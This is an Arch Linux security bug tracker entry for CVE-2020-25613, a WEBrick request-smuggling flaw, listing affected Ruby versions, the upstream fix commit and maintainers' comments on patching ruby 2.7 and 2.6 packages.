FS#68051 : [security][ruby][ruby2.6] CVE-2020-25613

FS#68051 - [security][ruby][ruby2.6] CVE-2020-25613

Attached to Project: Arch Linux
Opened by loqs (loqs) - Tuesday, 29 September 2020, 23:36 GMT
Last edited by Antonio Rojas (arojas) - Sunday, 19 June 2022, 09:33 GMT

Task Type	Bug Report
Category	Security
Status	Closed
Assigned To	Levente Polyak (anthraxx)
Architecture	All
Severity	High
Priority	Normal
Reported Version
Due in Version	Undecided
Due Date	Undecided
Percent Complete
Votes	0
Private	No

Details

Description:
WEBrick was too tolerant against an invalid Transfer-Encoding header. This may lead to inconsistent interpretation between WEBrick and some HTTP proxy servers, which may allow the attacker to “smuggle” a request.
Affected versions
webrick gem 1.6.0 or prior
bundled versions of webrick in ruby 2.7.1 or prior
bundled versions of webrick in ruby 2.6.6 or prior
bundled versions of webrick in ruby 2.5.8 or prior

Additional info:
* ruby 2.7.1-3
* ruby2.6 2.6.6-1
* https://www.ruby-lang.org/en/news/2020/09/29/http-request-smuggling-cve-2020-25613/

This task depends upon

Closed by Antonio Rojas (arojas)
Sunday, 19 June 2022, 09:33 GMT
Reason for closing: Fixed

Comment by loqs (loqs) - Wednesday, 30 September 2020, 22:00 GMT

Fix on the 2.7 branch [1]. It applies cleanly to 2.7.1 and 2.6.6.

[1] https://git.ruby-lang.org/ruby.git/commit/?id=828c34e58b63d64558ec0f2d1d7ae401c5e6b21f

Comment by Anatol Pomozov (anatolik) - Wednesday, 30 September 2020, 22:14 GMT

ruby2.7 has been patched in ruby-2.7.1-4

Leaving patching 2.6 to Sergei who added ruby26 to the repo.

Comment by Anatol Pomozov (anatolik) - Wednesday, 30 September 2020, 22:15 GMT

this task cannot be assigned to Sergei so I added him at the "Notification" page.

	Tasks related to this task (0)

Duplicate tasks of this task (0)

Arch Linux

FS#68051 - [security][ruby][ruby2.6] CVE-2020-25613

Details

Loading...